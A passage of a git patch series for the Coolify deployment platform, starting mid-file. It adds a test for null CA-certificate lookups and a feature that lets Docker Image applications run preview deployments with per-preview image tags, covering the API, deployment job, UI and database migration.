Q6IDIwcwogICAgICByZXRyaWVzOiAxMAo=",
         "tags": [
             "newsletter",
             "mailing list",
diff --git a/tests/Feature/SslCertificateRegenerationTest.php b/tests/Feature/SslCertificateRegenerationTest.php
new file mode 100644
index 000000000..06d312935
--- /dev/null
+++ b/tests/Feature/SslCertificateRegenerationTest.php
@@ -0,0 +1,82 @@
+<?php
+
+use App\Models\Server;
+use App\Models\SslCertificate;
+use App\Models\Team;
+use App\Models\User;
+use Illuminate\Foundation\Testing\RefreshDatabase;
+
+uses(RefreshDatabase::class);
+
+beforeEach(function () {
+    $this->team = Team::factory()->create();
+    $this->user = User::factory()->create();
+    $this->team->members()->attach($this->user->id, ['role' => 'owner']);
+    $this->actingAs($this->user);
+    session(['currentTeam' => $this->team]);
+
+    $this->server = Server::factory()->create(['team_id' => $this->team->id]);
+});
+
+test('server with no CA certificate returns null from sslCertificates query', function () {
+    $caCert = $this->server->sslCertificates()
+        ->where('is_ca_certificate', true)
+        ->first();
+
+    expect($caCert)->toBeNull();
+});
+
+test('accessing property on null CA cert throws an error', function () {
+    // This test verifies the exact scenario that caused the 500 error:
+    // querying for a CA cert on a server that has none, then trying to access properties
+    $caCert = $this->server->sslCertificates()
+        ->where('is_ca_certificate', true)
+        ->first();
+
+    expect($caCert)->toBeNull();
+
+    // Without the fix, the code would do:
+    // caCert: $caCert->ssl_certificate  <-- 500 error
+    expect(fn () => $caCert->ssl_certificate)
+        ->toThrow(ErrorException::class);
+});
+
+test('CA certificate can be retrieved when it exists on the server', function () {
+    // Create a CA certificate directly (simulating what generateCaCertificate does)
+    SslCertificate::create([
+        'server_id' => $this->server->id,
+        'is_ca_certificate' => true,
+        'ssl_certificate' => 'test-ca-cert',
+        'ssl_private_key' => 'test-ca-key',
+        'common_name' => 'Coolify CA Certificate',
+        'valid_until' => now()->addYears(10),
+    ]);
+
+    $caCert = $this->server->sslCertificates()
+        ->where('is_ca_certificate', true)
+        ->first();
+
+    expect($caCert)->not->toBeNull()
+        ->and($caCert->is_ca_certificate)->toBeTruthy()
+        ->and($caCert->ssl_certificate)->toBe('test-ca-cert')
+        ->and($caCert->ssl_private_key)->toBe('test-ca-key');
+});
+
+test('non-CA certificate is not returned when querying for CA certificate', function () {
+    // Create only a regular (non-CA) certificate
+    SslCertificate::create([
+        'server_id' => $this->server->id,
+        'is_ca_certificate' => false,
+        'ssl_certificate' => 'test-cert',
+        'ssl_private_key' => 'test-key',
+        'common_name' => 'test-db-uuid',
+        'valid_until' => now()->addYear(),
+    ]);
+
+    $caCert = $this->server->sslCertificates()
+        ->where('is_ca_certificate', true)
+        ->first();
+
+    // The CA cert query should return null since only a regular cert exists
+    expect($caCert)->toBeNull();
+});

From 61f47cc7ee0ddf944e39f3c10cafa089d458d51a Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Mon, 30 Mar 2026 13:35:35 +0200
Subject: [PATCH 202/213] feat(deployments): support Docker image tags for
 preview deployments

Add end-to-end support for `docker_registry_image_tag` in preview and deployment queue flows.

- Extend deploy API to accept `pull_request_id` alias and `docker_tag` for preview deploys
- Persist preview-specific Docker tags on `application_previews` and `application_deployment_queues`
- Pass tag through `queue_application_deployment()` and de-duplicate queued jobs by tag
- Update deployment job logic to resolve and use preview Docker tags for dockerimage build packs
- Update Livewire previews UI/state to manage per-preview tags and manual preview/tag inputs
- Add migration for new tag columns and model fillable/casts updates
- Add feature and unit tests covering API behavior and tag resolution
---
 app/Http/Controllers/Api/DeployController.php |  76 +++++++--
 app/Jobs/ApplicationDeploymentJob.php         |  34 +++-
 app/Livewire/Project/Application/Previews.php |  80 ++++++++--
 app/Models/ApplicationDeploymentQueue.php     |   2 +
 app/Models/ApplicationPreview.php             |   6 +
 app/Models/DockerCleanupExecution.php         |   1 +
 bootstrap/helpers/applications.php            |   4 +-
 ...ication_previews_and_deployment_queues.php |  30 ++++
 .../application/configuration.blade.php       |   2 +-
 .../project/application/previews.blade.php    |  33 +++-
 tests/Feature/DockerCleanupJobTest.php        |  16 ++
 .../DockerImagePreviewDeploymentApiTest.php   | 146 ++++++++++++++++++
 .../DockerImagePreviewTagResolutionTest.php   |  76 +++++++++
 13 files changed, 468 insertions(+), 38 deletions(-)
 create mode 100644 database/migrations/2026_03_30_120000_add_docker_registry_image_tag_to_application_previews_and_deployment_queues.php
 create mode 100644 tests/Feature/DockerImagePreviewDeploymentApiTest.php
 create mode 100644 tests/Unit/DockerImagePreviewTagResolutionTest.php

diff --git a/app/Http/Controllers/Api/DeployController.php b/app/Http/Controllers/Api/DeployController.php
index e490f3b0c..6ff06c10a 100644
--- a/app/Http/Controllers/Api/DeployController.php
+++ b/app/Http/Controllers/Api/DeployController.php
@@ -4,12 +4,15 @@
 
 use App\Actions\Database\StartDatabase;
 use App\Actions\Service\StartService;
+use App\Enums\ApplicationDeploymentStatus;
 use App\Http\Controllers\Controller;
 use App\Models\Application;
 use App\Models\ApplicationDeploymentQueue;
+use App\Models\ApplicationPreview;
 use App\Models\Server;
 use App\Models\Service;
 use App\Models\Tag;
+use Illuminate\Auth\Access\AuthorizationException;
 use Illuminate\Http\Request;
 use OpenApi\Attributes as OA;
 use Visus\Cuid2\Cuid2;
@@ -228,8 +231,8 @@ public function cancel_deployment(Request $request)
 
         // Check if deployment can be cancelled (must be queued or in_progress)
         $cancellableStatuses = [
-            \App\Enums\ApplicationDeploymentStatus::QUEUED->value,
-            \App\Enums\ApplicationDeploymentStatus::IN_PROGRESS->value,
+            ApplicationDeploymentStatus::QUEUED->value,
+            ApplicationDeploymentStatus::IN_PROGRESS->value,
         ];
 
         if (! in_array($deployment->status, $cancellableStatuses)) {
@@ -246,7 +249,7 @@ public function cancel_deployment(Request $request)
 
             // Mark deployment as cancelled
             $deployment->update([
-                'status' => \App\Enums\ApplicationDeploymentStatus::CANCELLED_BY_USER->value,
+                'status' => ApplicationDeploymentStatus::CANCELLED_BY_USER->value,
             ]);
 
             // Get the server
@@ -304,6 +307,8 @@ public function cancel_deployment(Request $request)
             new OA\Parameter(name: 'uuid', in: 'query', description: 'Resource UUID(s). Comma separated list is also accepted.', schema: new OA\Schema(type: 'string')),
             new OA\Parameter(name: 'force', in: 'query', description: 'Force rebuild (without cache)', schema: new OA\Schema(type: 'boolean')),
             new OA\Parameter(name: 'pr', in: 'query', description: 'Pull Request Id for deploying specific PR builds. Cannot be used with tag parameter.', schema: new OA\Schema(type: 'integer')),
+            new OA\Parameter(name: 'pull_request_id', in: 'query', description: 'Preview deployment identifier. Alias of pr.', schema: new OA\Schema(type: 'integer')),
+            new OA\Parameter(name: 'docker_tag', in: 'query', description: 'Docker image tag for Docker Image preview deployments. Requires pull_request_id.', schema: new OA\Schema(type: 'string')),
         ],
 
         responses: [
@@ -354,7 +359,9 @@ public function deploy(Request $request)
         $uuids = $request->input('uuid');
         $tags = $request->input('tag');
         $force = $request->input('force') ?? false;
-        $pr = $request->input('pr') ? max((int) $request->input('pr'), 0) : 0;
+        $pullRequestId = $request->input('pull_request_id', $request->input('pr'));
+        $pr = $pullRequestId ? max((int) $pullRequestId, 0) : 0;
+        $dockerTag = $request->string('docker_tag')->trim()->value() ?: null;
 
         if ($uuids && $tags) {
             return response()->json(['message' => 'You can only use uuid or tag, not both.'], 400);
@@ -362,16 +369,22 @@ public function deploy(Request $request)
         if ($tags && $pr) {
             return response()->json(['message' => 'You can only use tag or pr, not both.'], 400);
         }
+        if ($dockerTag && $pr === 0) {
+            return response()->json(['message' => 'docker_tag requires pull_request_id.'], 400);
+        }
+        if ($dockerTag && $tags) {
+            return response()->json(['message' => 'You can only use tag or docker_tag, not both.'], 400);
+        }
         if ($tags) {
             return $this->by_tags($tags, $teamId, $force);
         } elseif ($uuids) {
-            return $this->by_uuids($uuids, $teamId, $force, $pr);
+            return $this->by_uuids($uuids, $teamId, $force, $pr, $dockerTag);
         }
 
         return response()->json(['message' => 'You must provide uuid or tag.'], 400);
     }
 
-    private function by_uuids(string $uuid, int $teamId, bool $force = false, int $pr = 0)
+    private function by_uuids(string $uuid, int $teamId, bool $force = false, int $pr = 0, ?string $dockerTag = null)
     {
         $uuids = explode(',', $uuid);
         $uuids = collect(array_filter($uuids));
@@ -384,15 +397,22 @@ private function by_uuids(string $uuid, int $teamId, bool $force = false, int $p
         foreach ($uuids as $uuid) {
             $resource = getResourceByUuid($uuid, $teamId);
             if ($resource) {
+                $dockerTagForResource = $dockerTag;
                 if ($pr !== 0) {
-                    $preview = $resource->previews()->where('pull_request_id', $pr)->first();
+                    $preview = null;
+                    if ($resource instanceof Application && $resource->build_pack === 'dockerimage') {
+                        $preview = $this->upsertDockerImagePreview($resource, $pr, $dockerTag);
+                        $dockerTagForResource = $preview?->docker_registry_image_tag;
+                    } else {
+                        $preview = $resource->previews()->where('pull_request_id', $pr)->first();
+                    }
                     if (! $preview) {
                         $deployments->push(['message' => "Pull request {$pr} not found for this resource.", 'resource_uuid' => $uuid]);
 
                         continue;
                     }
                 }
-                $result = $this->deploy_resource($resource, $force, $pr);
+                $result = $this->deploy_resource($resource, $force, $pr, $dockerTagForResource);
                 if (isset($result['status']) && $result['status'] === 429) {
                     return response()->json(['message' => $result['message']], 429)->header('Retry-After', 60);
                 }
@@ -465,7 +485,7 @@ public function by_tags(string $tags, int $team_id, bool $force = false)
         return response()->json(['message' => 'No resources found with this tag.'], 404);
     }
 
-    public function deploy_resource($resource, bool $force = false, int $pr = 0): array
+    public function deploy_resource($resource, bool $force = false, int $pr = 0, ?string $dockerTag = null): array
     {
         $message = null;
         $deployment_uuid = null;
@@ -477,9 +497,12 @@ public function deploy_resource($resource, bool $force = false, int $pr = 0): ar
                 // Check authorization for application deployment
                 try {
                     $this->authorize('deploy', $resource);
-                } catch (\Illuminate\Auth\Access\AuthorizationException $e) {
+                } catch (AuthorizationException $e) {
                     return ['message' => 'Unauthorized to deploy this application.', 'deployment_uuid' => null];
                 }
+                if ($dockerTag !== null && $resource->build_pack !== 'dockerimage') {
+                    return ['message' => 'docker_tag can only be used with Docker Image applications.', 'deployment_uuid' => null];
+                }
                 $deployment_uuid = new Cuid2;
                 $result = queue_application_deployment(
                     application: $resource,
@@ -487,6 +510,7 @@ public function deploy_resource($resource, bool $force = false, int $pr = 0): ar
                     force_rebuild: $force,
                     pull_request_id: $pr,
                     is_api: true,
+                    docker_registry_image_tag: $dockerTag,
                 );
                 if ($result['status'] === 'queue_full') {
                     return ['message' => $result['message'], 'deployment_uuid' => null, 'status' => 429];
@@ -500,7 +524,7 @@ public function deploy_resource($resource, bool $force = false, int $pr = 0): ar
                 // Check authorization for service deployment
                 try {
                     $this->authorize('deploy', $resource);
-                } catch (\Illuminate\Auth\Access\AuthorizationException $e) {
+                } catch (AuthorizationException $e) {
                     return ['message' => 'Unauthorized to deploy this service.', 'deployment_uuid' => null];
                 }
                 StartService::run($resource);
@@ -510,7 +534,7 @@ public function deploy_resource($resource, bool $force = false, int $pr = 0): ar
                 // Database resource - check authorization
                 try {
                     $this->authorize('manage', $resource);
-                } catch (\Illuminate\Auth\Access\AuthorizationException $e) {
+                } catch (AuthorizationException $e) {
                     return ['message' => 'Unauthorized to start this database.', 'deployment_uuid' => null];
                 }
                 StartDatabase::dispatch($resource);
@@ -525,6 +549,34 @@ public function deploy_resource($resource, bool $force = false, int $pr = 0): ar
         return ['message' => $message, 'deployment_uuid' => $deployment_uuid];
     }
 
+    private function upsertDockerImagePreview(Application $application, int $pullRequestId, ?string $dockerTag): ?ApplicationPreview
+    {
+        $preview = $application->previews()->where('pull_request_id', $pullRequestId)->first();
+
+        if (! $preview && $dockerTag === null) {
+            return null;
+        }
+
+        if (! $preview) {
+            $preview = ApplicationPreview::create([
+                'application_id' => $application->id,
+                'pull_request_id' => $pullRequestId,
+                'pull_request_html_url' => '',
+                'docker_registry_image_tag' => $dockerTag,
+            ]);
+            $preview->generate_preview_fqdn();
+
+            return $preview;
+        }
+
+        if ($dockerTag !== null && $preview->docker_registry_image_tag !== $dockerTag) {
+            $preview->docker_registry_image_tag = $dockerTag;
+            $preview->save();
+        }
+
+        return $preview;
+    }
+
     #[OA\Get(
         summary: 'List application deployments',
         description: 'List application deployments by using the app uuid',
diff --git a/app/Jobs/ApplicationDeploymentJob.php b/app/Jobs/ApplicationDeploymentJob.php
index dc8bc4374..833e6bfe8 100644
--- a/app/Jobs/ApplicationDeploymentJob.php
+++ b/app/Jobs/ApplicationDeploymentJob.php
@@ -76,6 +76,8 @@ class ApplicationDeploymentJob implements ShouldBeEncrypted, ShouldQueue
 
     private ?string $dockerImageTag = null;
 
+    private ?string $dockerImagePreviewTag = null;
+
     private GithubApp|GitlabApp|string $source = 'other';
 
     private StandaloneDocker|SwarmDocker $destination;
@@ -208,6 +210,7 @@ public function __construct(public int $application_deployment_queue_id)
         $this->restart_only = $this->application_deployment_queue->restart_only;
         $this->restart_only = $this->restart_only && $this->application->build_pack !== 'dockerimage' && $this->application->build_pack !== 'dockerfile';
         $this->only_this_server = $this->application_deployment_queue->only_this_server;
+        $this->dockerImagePreviewTag = $this->application_deployment_queue->docker_registry_image_tag;
 
         $this->git_type = data_get($this->application_deployment_queue, 'git_type');
 
@@ -246,6 +249,9 @@ public function __construct(public int $application_deployment_queue_id)
         // Set preview fqdn
         if ($this->pull_request_id !== 0) {
             $this->preview = ApplicationPreview::findPreviewByApplicationAndPullId($this->application->id, $this->pull_request_id);
+            if ($this->application->build_pack === 'dockerimage' && str($this->dockerImagePreviewTag)->isEmpty()) {
+                $this->dockerImagePreviewTag = $this->preview?->docker_registry_image_tag;
+            }
             if ($this->preview) {
                 if ($this->application->build_pack === 'dockercompose') {
                     $this->preview->generate_preview_fqdn_compose();
@@ -466,14 +472,14 @@ private function decide_what_to_do()
             $this->just_restart();
 
             return;
+        } elseif ($this->application->build_pack === 'dockerimage') {
+            $this->deploy_dockerimage_buildpack();
         } elseif ($this->pull_request_id !== 0) {
             $this->deploy_pull_request();
         } elseif ($this->application->dockerfile) {
             $this->deploy_simple_dockerfile();
         } elseif ($this->application->build_pack === 'dockercompose') {
             $this->deploy_docker_compose_buildpack();
-        } elseif ($this->application->build_pack === 'dockerimage') {
-            $this->deploy_dockerimage_buildpack();
         } elseif ($this->application->build_pack === 'dockerfile') {
             $this->deploy_dockerfile_buildpack();
         } elseif ($this->application->build_pack === 'static') {
@@ -554,11 +560,7 @@ private function deploy_simple_dockerfile()
     private function deploy_dockerimage_buildpack()
     {
         $this->dockerImage = $this->application->docker_registry_image_name;
-        if (str($this->application->docker_registry_image_tag)->isEmpty()) {
-            $this->dockerImageTag = 'latest';
-        } else {
-            $this->dockerImageTag = $this->application->docker_registry_image_tag;
-        }
+        $this->dockerImageTag = $this->resolveDockerImageTag();
 
         // Check if this is an image hash deployment
         $isImageHash = str($this->dockerImageTag)->startsWith('sha256-');
@@ -575,6 +577,19 @@ private function deploy_dockerimage_buildpack()
         $this->rolling_update();
     }
 
+    private function resolveDockerImageTag(): string
+    {
+        if ($this->pull_request_id !== 0 && str($this->dockerImagePreviewTag)->isNotEmpty()) {
+            return $this->dockerImagePreviewTag;
+        }
+
+        if (str($this->application->docker_registry_image_tag)->isNotEmpty()) {
+            return $this->application->docker_registry_image_tag;
+        }
+
+        return 'latest';
+    }
+
     private function deploy_docker_compose_buildpack()
     {
         if (data_get($this->application, 'docker_compose_location')) {
@@ -1934,6 +1949,11 @@ private function query_logs()
 
     private function deploy_pull_request()
     {
+        if ($this->application->build_pack === 'dockerimage') {
+            $this->deploy_dockerimage_buildpack();
+
+            return;
+        }
         if ($this->application->build_pack === 'dockercompose') {
             $this->deploy_docker_compose_buildpack();
 
diff --git a/app/Livewire/Project/Application/Previews.php b/app/Livewire/Project/Application/Previews.php
index 576df8589..c61a4e4a7 100644
--- a/app/Livewire/Project/Application/Previews.php
+++ b/app/Livewire/Project/Application/Previews.php
@@ -35,8 +35,17 @@ class Previews extends Component
 
     public array $previewFqdns = [];
 
+    public array $previewDockerTags = [];
+
+    public ?int $manualPullRequestId = null;
+
+    public ?string $manualDockerTag = null;
+
     protected $rules = [
         'previewFqdns.*' => 'string|nullable',
+        'previewDockerTags.*' => 'string|nullable',
+        'manualPullRequestId' => 'integer|min:1|nullable',
+        'manualDockerTag' => 'string|nullable',
     ];
 
     public function mount()
@@ -53,12 +62,17 @@ private function syncData(bool $toModel = false): void
                 $preview = $this->application->previews->get($key);
                 if ($preview) {
                     $preview->fqdn = $fqdn;
+                    if ($this->application->build_pack === 'dockerimage') {
+                        $preview->docker_registry_image_tag = $this->previewDockerTags[$key] ?? null;
+                    }
                 }
             }
         } else {
             $this->previewFqdns = [];
+            $this->previewDockerTags = [];
             foreach ($this->application->previews as $key => $preview) {
                 $this->previewFqdns[$key] = $preview->fqdn;
+                $this->previewDockerTags[$key] = $preview->docker_registry_image_tag;
             }
         }
     }
@@ -174,7 +188,7 @@ public function generate_preview($preview_id)
         }
     }
 
-    public function add(int $pull_request_id, ?string $pull_request_html_url = null)
+    public function add(int $pull_request_id, ?string $pull_request_html_url = null, ?string $docker_registry_image_tag = null)
     {
         try {
             $this->authorize('update', $this->application);
@@ -195,13 +209,18 @@ public function add(int $pull_request_id, ?string $pull_request_html_url = null)
             } else {
                 $this->setDeploymentUuid();
                 $found = ApplicationPreview::where('application_id', $this->application->id)->where('pull_request_id', $pull_request_id)->first();
-                if (! $found && ! is_null($pull_request_html_url)) {
+                if (! $found && (! is_null($pull_request_html_url) || ($this->application->build_pack === 'dockerimage' && str($docker_registry_image_tag)->isNotEmpty()))) {
                     $found = ApplicationPreview::forceCreate([
                         'application_id' => $this->application->id,
                         'pull_request_id' => $pull_request_id,
-                        'pull_request_html_url' => $pull_request_html_url,
+                        'pull_request_html_url' => $pull_request_html_url ?? '',
+                        'docker_registry_image_tag' => $docker_registry_image_tag,
                     ]);
                 }
+                if ($found && $this->application->build_pack === 'dockerimage' && str($docker_registry_image_tag)->isNotEmpty()) {
+                    $found->docker_registry_image_tag = $docker_registry_image_tag;
+                    $found->save();
+                }
                 $found->generate_preview_fqdn();
                 $this->application->refresh();
                 $this->syncData(false);
@@ -217,37 +236,50 @@ public function force_deploy_without_cache(int $pull_request_id, ?string $pull_r
     {
         $this->authorize('deploy', $this->application);
 
-        $this->deploy($pull_request_id, $pull_request_html_url, force_rebuild: true);
+        $dockerRegistryImageTag = null;
+        if ($this->application->build_pack === 'dockerimage') {
+            $dockerRegistryImageTag = $this->application->previews()
+                ->where('pull_request_id', $pull_request_id)
+                ->value('docker_registry_image_tag');
+        }
+
+        $this->deploy($pull_request_id, $pull_request_html_url, force_rebuild: true, docker_registry_image_tag: $dockerRegistryImageTag);
     }
 
-    public function add_and_deploy(int $pull_request_id, ?string $pull_request_html_url = null)
+    public function add_and_deploy(int $pull_request_id, ?string $pull_request_html_url = null, ?string $docker_registry_image_tag = null)
     {
         $this->authorize('deploy', $this->application);
 
-        $this->add($pull_request_id, $pull_request_html_url);
-        $this->deploy($pull_request_id, $pull_request_html_url);
+        $this->add($pull_request_id, $pull_request_html_url, $docker_registry_image_tag);
+        $this->deploy($pull_request_id, $pull_request_html_url, force_rebuild: false, docker_registry_image_tag: $docker_registry_image_tag);
     }
 
-    public function deploy(int $pull_request_id, ?string $pull_request_html_url = null, bool $force_rebuild = false)
+    public function deploy(int $pull_request_id, ?string $pull_request_html_url = null, bool $force_rebuild = false, ?string $docker_registry_image_tag = null)
     {
         $this->authorize('deploy', $this->application);
 
         try {
             $this->setDeploymentUuid();
             $found = ApplicationPreview::where('application_id', $this->application->id)->where('pull_request_id', $pull_request_id)->first();
-            if (! $found && ! is_null($pull_request_html_url)) {
-                ApplicationPreview::forceCreate([
+            if (! $found && (! is_null($pull_request_html_url) || ($this->application->build_pack === 'dockerimage' && str($docker_registry_image_tag)->isNotEmpty()))) {
+                $found = ApplicationPreview::forceCreate([
                     'application_id' => $this->application->id,
                     'pull_request_id' => $pull_request_id,
-                    'pull_request_html_url' => $pull_request_html_url,
+                    'pull_request_html_url' => $pull_request_html_url ?? '',
+                    'docker_registry_image_tag' => $docker_registry_image_tag,
                 ]);
             }
+            if ($found && $this->application->build_pack === 'dockerimage' && str($docker_registry_image_tag)->isNotEmpty()) {
+                $found->docker_registry_image_tag = $docker_registry_image_tag;
+                $found->save();
+            }
             $result = queue_application_deployment(
                 application: $this->application,
                 deployment_uuid: $this->deployment_uuid,
                 force_rebuild: $force_rebuild,
                 pull_request_id: $pull_request_id,
                 git_type: $found->git_type ?? null,
+                docker_registry_image_tag: $docker_registry_image_tag,
             );
             if ($result['status'] === 'queue_full') {
                 $this->dispatch('error', 'Deployment queue full', $result['message']);
@@ -277,6 +309,32 @@ protected function setDeploymentUuid()
         $this->parameters['deployment_uuid'] = $this->deployment_uuid;
     }
 
+    public function addDockerImagePreview()
+    {
+        $this->authorize('deploy', $this->application);
+        $this->validateOnly('manualPullRequestId');
+        $this->validateOnly('manualDockerTag');
+
+        if ($this->application->build_pack !== 'dockerimage') {
+            $this->dispatch('error', 'Manual Docker Image previews are only available for Docker Image applications.');
+
+            return;
+        }
+
+        if ($this->manualPullRequestId === null || str($this->manualDockerTag)->isEmpty()) {
+            $this->dispatch('error', 'Both pull request id and docker tag are required.');
+
+            return;
+        }
+
+        $dockerTag = str($this->manualDockerTag)->trim()->value();
+
+        $this->add_and_deploy($this->manualPullRequestId, null, $dockerTag);
+
+        $this->manualPullRequestId = null;
+        $this->manualDockerTag = null;
+    }
+
     private function stopContainers(array $containers, $server)
     {
         $containersToStop = collect($containers)->pluck('Names')->toArray();
diff --git a/app/Models/ApplicationDeploymentQueue.php b/app/Models/ApplicationDeploymentQueue.php
index 3b33b1b67..21cb58abe 100644
--- a/app/Models/ApplicationDeploymentQueue.php
+++ b/app/Models/ApplicationDeploymentQueue.php
@@ -16,6 +16,7 @@
         'application_id' => ['type' => 'string'],
         'deployment_uuid' => ['type' => 'string'],
         'pull_request_id' => ['type' => 'integer'],
+        'docker_registry_image_tag' => ['type' => 'string', 'nullable' => true],
         'force_rebuild' => ['type' => 'boolean'],
         'commit' => ['type' => 'string'],
         'status' => ['type' => 'string'],
@@ -67,6 +68,7 @@ class ApplicationDeploymentQueue extends Model
     ];
 
     protected $casts = [
+        'pull_request_id' => 'integer',
         'finished_at' => 'datetime',
     ];
 
diff --git a/app/Models/ApplicationPreview.php b/app/Models/ApplicationPreview.php
index 8dd6da074..818f96d8e 100644
--- a/app/Models/ApplicationPreview.php
+++ b/app/Models/ApplicationPreview.php
@@ -11,6 +11,7 @@ class ApplicationPreview extends BaseModel
     use SoftDeletes;
 
     protected $fillable = [
+        'application_id',
         'pull_request_id',
         'pull_request_html_url',
         'pull_request_issue_comment_id',
@@ -18,9 +19,14 @@ class ApplicationPreview extends BaseModel
         'status',
         'git_type',
         'docker_compose_domains',
+        'docker_registry_image_tag',
         'last_online_at',
     ];
 
+    protected $casts = [
+        'pull_request_id' => 'integer',
+    ];
+
     protected static function booted()
     {
         static::forceDeleting(function ($preview) {
diff --git a/app/Models/DockerCleanupExecution.php b/app/Models/DockerCleanupExecution.php
index 162913b3e..280277951 100644
--- a/app/Models/DockerCleanupExecution.php
+++ b/app/Models/DockerCleanupExecution.php
@@ -7,6 +7,7 @@
 class DockerCleanupExecution extends BaseModel
 {
     protected $fillable = [
+        'server_id',
         'status',
         'message',
         'cleanup_log',
diff --git a/bootstrap/helpers/applications.php b/bootstrap/helpers/applications.php
index 4af6ac90a..ceae64d84 100644
--- a/bootstrap/helpers/applications.php
+++ b/bootstrap/helpers/applications.php
@@ -12,7 +12,7 @@
 use Spatie\Url\Url;
 use Visus\Cuid2\Cuid2;
 
-function queue_application_deployment(Application $application, string $deployment_uuid, ?int $pull_request_id = 0, string $commit = 'HEAD', bool $force_rebuild = false, bool $is_webhook = false, bool $is_api = false, bool $restart_only = false, ?string $git_type = null, bool $no_questions_asked = false, ?Server $server = null, ?StandaloneDocker $destination = null, bool $only_this_server = false, bool $rollback = false)
+function queue_application_deployment(Application $application, string $deployment_uuid, ?int $pull_request_id = 0, string $commit = 'HEAD', bool $force_rebuild = false, bool $is_webhook = false, bool $is_api = false, bool $restart_only = false, ?string $git_type = null, bool $no_questions_asked = false, ?Server $server = null, ?StandaloneDocker $destination = null, bool $only_this_server = false, bool $rollback = false, ?string $docker_registry_image_tag = null)
 {
     $application_id = $application->id;
     $deployment_link = Url::fromString($application->link()."/deployment/{$deployment_uuid}");
@@ -47,6 +47,7 @@ function queue_application_deployment(Application $application, string $deployme
     $existing_deployment = ApplicationDeploymentQueue::where('application_id', $application_id)
         ->where('commit', $commit)
         ->where('pull_request_id', $pull_request_id)
+        ->where('docker_registry_image_tag', $docker_registry_image_tag)
         ->whereIn('status', [ApplicationDeploymentStatus::IN_PROGRESS->value, ApplicationDeploymentStatus::QUEUED->value])
         ->first();
 
@@ -72,6 +73,7 @@ function queue_application_deployment(Application $application, string $deployme
         'deployment_uuid' => $deployment_uuid,
         'deployment_url' => $deployment_url,
         'pull_request_id' => $pull_request_id,
+        'docker_registry_image_tag' => $docker_registry_image_tag,
         'force_rebuild' => $force_rebuild,
         'is_webhook' => $is_webhook,
         'is_api' => $is_api,
diff --git a/database/migrations/2026_03_30_120000_add_docker_registry_image_tag_to_application_previews_and_deployment_queues.php b/database/migrations/2026_03_30_120000_add_docker_registry_image_tag_to_application_previews_and_deployment_queues.php
new file mode 100644
index 000000000..2dafa2737
--- /dev/null
+++ b/database/migrations/2026_03_30_120000_add_docker_registry_image_tag_to_application_previews_and_deployment_queues.php
@@ -0,0 +1,30 @@
+<?php
+
+use Illuminate\Database\Migrations\Migration;
+use Illuminate\Database\Schema\Blueprint;
+use Illuminate\Support\Facades\Schema;
+
+return new class extends Migration
+{
+    public function up(): void
+    {
+        Schema::table('application_previews', function (Blueprint $table) {
+            $table->string('docker_registry_image_tag')->nullable()->after('docker_compose_domains');
+        });
+
+        Schema::table('application_deployment_queues', function (Blueprint $table) {
+            $table->string('docker_registry_image_tag')->nullable()->after('pull_request_id');
+        });
+    }
+
+    public function down(): void
+    {
+        Schema::table('application_previews', function (Blueprint $table) {
+            $table->dropColumn('docker_registry_image_tag');
+        });
+
+        Schema::table('application_deployment_queues', function (Blueprint $table) {
+            $table->dropColumn('docker_registry_image_tag');
+        });
+    }
+};
diff --git a/resources/views/livewire/project/application/configuration.blade.php b/resources/views/livewire/project/application/configuration.blade.php
index 597bfa0a4..448fdabe9 100644
--- a/resources/views/livewire/project/application/configuration.blade.php
+++ b/resources/views/livewire/project/application/configuration.blade.php
@@ -46,7 +46,7 @@
                 href="{{ route('project.application.scheduled-tasks.show', ['project_uuid' => $project->uuid, 'environment_uuid' => $environment->uuid, 'application_uuid' => $application->uuid]) }}"><span class="menu-item-label">Scheduled Tasks</span></a>
             <a class="sub-menu-item" {{ wireNavigate() }} wire:current.exact="menu-item-active"
                 href="{{ route('project.application.webhooks', ['project_uuid' => $project->uuid, 'environment_uuid' => $environment->uuid, 'application_uuid' => $application->uuid]) }}"><span class="menu-item-label">Webhooks</span></a>
-            @if ($application->git_based())
+            @if ($application->git_based() || $application->build_pack === 'dockerimage')
                 <a class="sub-menu-item" {{ wireNavigate() }} wire:current.exact="menu-item-active"
                     href="{{ route('project.application.preview-deployments', ['project_uuid' => $project->uuid, 'environment_uuid' => $environment->uuid, 'application_uuid' => $application->uuid]) }}"><span class="menu-item-label">Preview Deployments</span></a>
             @endif
diff --git a/resources/views/livewire/project/application/previews.blade.php b/resources/views/livewire/project/application/previews.blade.php
index f0f5d0962..1ae86bf32 100644
--- a/resources/views/livewire/project/application/previews.blade.php
+++ b/resources/views/livewire/project/application/previews.blade.php
@@ -68,6 +68,20 @@ class="dark:text-warning">{{ $application->destination->server->name }}</span>.<
             @endif
         </div>
     </div>
+    @if ($application->build_pack === 'dockerimage')
+        <div class="flex flex-col gap-2 pt-4">
+            <h3>Manual Preview Deployment</h3>
+            <form wire:submit.prevent="addDockerImagePreview" class="flex flex-col gap-2 xl:flex-row xl:items-end">
+                <x-forms.input id="manualPullRequestId" label="Pull Request Id"
+                    helper="Used as the preview identifier for naming, domains, logs, and cleanup." />
+                <x-forms.input id="manualDockerTag" label="Docker Tag"
+                    helper="The image tag to deploy for this preview, for example pr_1234." />
+                @can('deploy', $application)
+                    <x-forms.button type="submit">Deploy Preview</x-forms.button>
+                @endcan
+            </form>
+        </div>
+    @endif
     @if ($application->previews->count() > 0)
         <h3 class="py-4">Deployments</h3>
         <div class="flex flex-wrap w-full gap-4">
@@ -87,11 +101,13 @@ class="dark:text-warning">{{ $application->destination->server->name }}</span>.<
                                 <x-external-link />
                             </a>
                         @endif
-                        |
-                        <a target="_blank" href="{{ data_get($preview, 'pull_request_html_url') }}">Open
-                            PR on Git
-                            <x-external-link />
-                        </a>
+                        @if (filled(data_get($preview, 'pull_request_html_url')))
+                            |
+                            <a target="_blank" href="{{ data_get($preview, 'pull_request_html_url') }}">Open
+                                PR on Git
+                                <x-external-link />
+                            </a>
+                        @endif
                         @if (count($parameters) > 0)
                             |
                             <a {{ wireNavigate() }}
@@ -131,6 +147,10 @@ class="flex items-end gap-2 pt-4">
                         <form wire:submit="save_preview('{{ $preview->id }}')" class="flex items-end gap-2 pt-4">
                             <x-forms.input label="Domain" helper="One domain per preview."
                                 id="previewFqdns.{{ $previewName }}" canGate="update" :canResource="$application"></x-forms.input>
+                            @if ($application->build_pack === 'dockerimage')
+                                <x-forms.input label="Docker Tag" helper="The image tag used for this preview deployment."
+                                    id="previewDockerTags.{{ $previewName }}" canGate="update" :canResource="$application"></x-forms.input>
+                            @endif
                             @can('update', $application)
                                 <x-forms.button type="submit">Save</x-forms.button>
